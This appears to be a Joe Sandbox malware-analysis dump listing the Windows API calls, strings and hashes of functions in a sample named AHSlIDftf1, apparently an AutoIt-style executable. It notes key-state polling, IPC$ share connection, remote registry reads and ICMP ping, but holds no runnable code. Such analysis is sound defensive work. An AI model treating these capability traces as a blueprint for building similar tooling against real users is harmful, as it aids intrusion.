                                                                                                            • Instruction ID: 922450b68dc2fd51c952919b7845ed551e3a94dc043b37e145bda468626b9717
                                                                                                            • Opcode Fuzzy Hash: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
                                                                                                            • Instruction Fuzzy Hash: 2631A57191024AABDB21EBA0DC89FEF37BCEF89700F5481A9F609D6150E77097458B34
                                                                                                            APIs
                                                                                                            • timeGetTime.WINMM ref: 00DBE6B4
                                                                                                              • Part of subcall function 00D6E551: timeGetTime.WINMM(?,?,00DBE6D4), ref: 00D6E555
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00DBE6E1
                                                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DBE705
                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DBE727
                                                                                                            • SetActiveWindow.USER32 ref: 00DBE746
                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DBE754
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DBE773
                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00DBE77E
                                                                                                            • IsWindow.USER32 ref: 00DBE78A
                                                                                                            • EndDialog.USER32(00000000), ref: 00DBE79B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                            • String ID: BUTTON
                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                            • Opcode ID: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
                                                                                                            • Instruction ID: 48a957551b817ffc44497526e8238b4ac5ff4c2ec64cf9a8a1ae7c747ef77978
                                                                                                            • Opcode Fuzzy Hash: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
                                                                                                            • Instruction Fuzzy Hash: CC218771210344FFEB106F22ECC9EA63B69FB55348B142429F516E63B1DB719C0A9A74
APIs
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DBEA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DBEA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBEA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DBEA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DBEAA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
• Instruction ID: 05f004a10b1ea2cc7b0069acf3c6144617da2604885c1b4c29d32583d2eb413d
• Opcode Fuzzy Hash: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
• Instruction Fuzzy Hash: B7117331A50359BADB20A7A6DC4ADFF6B7CEFD1B40F4414297C11A20D1EE705989C9B0
APIs
• GetDlgItem.USER32(?,00000001), ref: 00DB5CE2
• GetWindowRect.USER32(00000000,?), ref: 00DB5CFB
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DB5D59
• GetDlgItem.USER32(?,00000002), ref: 00DB5D69
• GetWindowRect.USER32(00000000,?), ref: 00DB5D7B
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DB5DCF
• GetDlgItem.USER32(?,000003E9), ref: 00DB5DDD
• GetWindowRect.USER32(00000000,?), ref: 00DB5DEF
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DB5E31
• GetDlgItem.USER32(?,000003EA), ref: 00DB5E44
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DB5E5A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00DB5E67
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
• Instruction ID: 97e230e370a8d62748e50d93d2e7f54cffc078fb2c66e71e7cf5d87be0e6d76b
• Opcode Fuzzy Hash: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
• Instruction Fuzzy Hash: C5511C70A10705AFDF18DF68DD89BAEBBB5EB48300F548229F916E6294D7709E01CB60
APIs
  • Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5
• DestroyWindow.USER32(?), ref: 00D68C81
• KillTimer.USER32(00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68D1B
• DestroyAcceleratorTable.USER32(00000000), ref: 00DA6973
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69A1
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69B8
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000), ref: 00DA69D4
• DeleteObject.GDI32(00000000), ref: 00DA69E6
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
• Instruction ID: 0f83f3d7af1a5f5448741cd58435a179dcf9ef8d763d683bc5a4cd0b29713c74
• Opcode Fuzzy Hash: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
• Instruction Fuzzy Hash: 14619C31502700DFCB359F25C998B2677F1FB95312F194658E082AA660CB31E9D6EFB1
APIs
  • Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952
• GetSysColor.USER32(0000000F), ref: 00D69862
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
• Instruction ID: dffacb8fba69a6dcc00b1d8790acefcefc91a95a2c6ea9d03fd79af8e9f5bfe9
• Opcode Fuzzy Hash: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
• Instruction Fuzzy Hash: 37417F31504740AFDB205F389C94BBA7BA9EB46361F18565AF9A28B2E1D731DC42DB30
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DB9717
• LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9720
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DB9742
• LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9745
• MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DB9866
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wcslen
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 747408836-2268648507
• Opcode ID: c82f4a1a33b3e22c6323e820f797a868ecf401f29342b57dd8017f41558302bd
• Instruction ID: fc5e47d36d7af93925a6e88c6d834e2518c1a7889e551fc8f8b7d0ac334b1659
• Opcode Fuzzy Hash: c82f4a1a33b3e22c6323e820f797a868ecf401f29342b57dd8017f41558302bd
• Instruction Fuzzy Hash: 78414A72800219AADF04FBE4DD96DEEB779EF14341F500065FA0672092EA356F49CB71
APIs
  • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DB07A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DB07BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DB07DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DB0804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DB082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB0837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB083C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 323675364-22481851
• Opcode ID: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
• Instruction ID: 27991b7b3393f5a39a4b0a38b309a760f47d9e10214e99c8dff7d160be01a18a
• Opcode Fuzzy Hash: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
• Instruction Fuzzy Hash: E141F572810229EBDF15EBA4DC95CEEB778FF44351B444129E912A7261EB309E48CBB0
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD3C5C
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DD3C8A
                                                                                                            • CoUninitialize.OLE32 ref: 00DD3C94
                                                                                                            • _wcslen.LIBCMT ref: 00DD3D2D
                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00DD3DB1
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DD3ED5
                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DD3F0E
                                                                                                            • CoGetObject.OLE32(?,00000000,00DEFB98,?), ref: 00DD3F2D
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00DD3F40
                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DD3FC4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3FD8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 429561992-0
                                                                                                            • Opcode ID: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
                                                                                                            • Instruction ID: 51c3d0098cfa8ca5b963a9cf4ddcc1196c32d4a257e794e9d2900ab0dc9c24e8
                                                                                                            • Opcode Fuzzy Hash: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
                                                                                                            • Instruction Fuzzy Hash: 91C112716083459F9700DF68C88492BBBE9EF89744F14491EF98A9B351D731EE06CB62
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC7AF3
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DC7B8F
                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00DC7BA3
                                                                                                            • CoCreateInstance.OLE32(00DEFD08,00000000,00000001,00E16E6C,?), ref: 00DC7BEF
                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DC7C74
                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00DC7CCC
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00DC7D57
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DC7D7A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00DC7D81
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00DC7DD6
                                                                                                            • CoUninitialize.OLE32 ref: 00DC7DDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2762341140-0
                                                                                                            • Opcode ID: fa9c61f58ac1d31b2f6413cc870be61dba298c0bb00e4bab9ea98d07cfba29b4
                                                                                                            • Instruction ID: 64a7665e686ae437f8090d4483ef2ee352d833edf7b08cad3f9d9c36f12e3d78
                                                                                                            • Opcode Fuzzy Hash: fa9c61f58ac1d31b2f6413cc870be61dba298c0bb00e4bab9ea98d07cfba29b4
                                                                                                            • Instruction Fuzzy Hash: DEC1EA75A04205AFCB14DFA4C884DAEBBB9FF48314B148599E81ADB361D730ED45CFA0
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DE5504
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE5515
                                                                                                            • CharNextW.USER32(00000158), ref: 00DE5544
                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DE5585
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DE559B
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE55AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CharNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1350042424-0
                                                                                                            • Opcode ID: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
                                                                                                            • Instruction ID: b557f505af55cbb36a465b4cf468d28d911890626166afa90f9825503aa945dc
                                                                                                            • Opcode Fuzzy Hash: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
                                                                                                            • Instruction Fuzzy Hash: 9861C130900689EFDF10AF52EC84AFE3B79EB053A8F144149F965AB295D7708A81DB70
                                                                                                            APIs
                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DAFAAF
                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00DAFB08
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DAFB1A
                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DAFB3A
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00DAFB8D
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DAFBA1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAFBB6
                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00DAFBC3
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBCC
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAFBDE
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBE9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706829360-0
                                                                                                            • Opcode ID: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
                                                                                                            • Instruction ID: e435b8ce2cfa16ddabe2f86c3278d98e0433d06f9395e1629d4d4c4d2391a8c3
                                                                                                            • Opcode Fuzzy Hash: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
                                                                                                            • Instruction Fuzzy Hash: 1A412035A102199FCB10EFA4D8949ADBBB9FF49354F008069F955EB361D730E946CBB0
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?), ref: 00DB9CA1
                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00DB9D22
                                                                                                            • GetKeyState.USER32(000000A0), ref: 00DB9D3D
                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00DB9D57
                                                                                                            • GetKeyState.USER32(000000A1), ref: 00DB9D6C
                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00DB9D84
                                                                                                            • GetKeyState.USER32(00000011), ref: 00DB9D96
                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00DB9DAE
                                                                                                            • GetKeyState.USER32(00000012), ref: 00DB9DC0
                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00DB9DD8
                                                                                                            • GetKeyState.USER32(0000005B), ref: 00DB9DEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$Async$Keyboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 541375521-0
                                                                                                            • Opcode ID: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
                                                                                                            • Instruction ID: e16b1a2ced8939e986cb4f1a33e21115f9c0823f1f34c442b38dc25380b9224c
                                                                                                            • Opcode Fuzzy Hash: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
                                                                                                            • Instruction Fuzzy Hash: A441B6345047C9A9FF31966188643F5FEA06F12344F4C805EDBC75A6C2DBA5A9C8CBB2
                                                                                                            APIs
                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00DD05BC
                                                                                                            • inet_addr.WSOCK32(?), ref: 00DD061C
                                                                                                            • gethostbyname.WSOCK32(?), ref: 00DD0628
                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00DD0636
                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06C6
                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06E5
                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00DD07B9
                                                                                                            • WSACleanup.WSOCK32 ref: 00DD07BF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                            • String ID: Ping
                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                            • Opcode ID: 1ed0548bbd4dd697afb0cf05717363f00358ee6cc300308584311e2fba99bf29
                                                                                                            • Instruction ID: 2c562ad78f7f1f8af92840c1ada53c1bd68b872e7fcfff960e6c7f6f08f9c38b
                                                                                                            • Opcode Fuzzy Hash: 1ed0548bbd4dd697afb0cf05717363f00358ee6cc300308584311e2fba99bf29
                                                                                                            • Instruction Fuzzy Hash: F7915D35604341AFD720DF15D488B1ABBE4EF84318F1885AAE8699F7A2C730ED45CFA1
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharLower
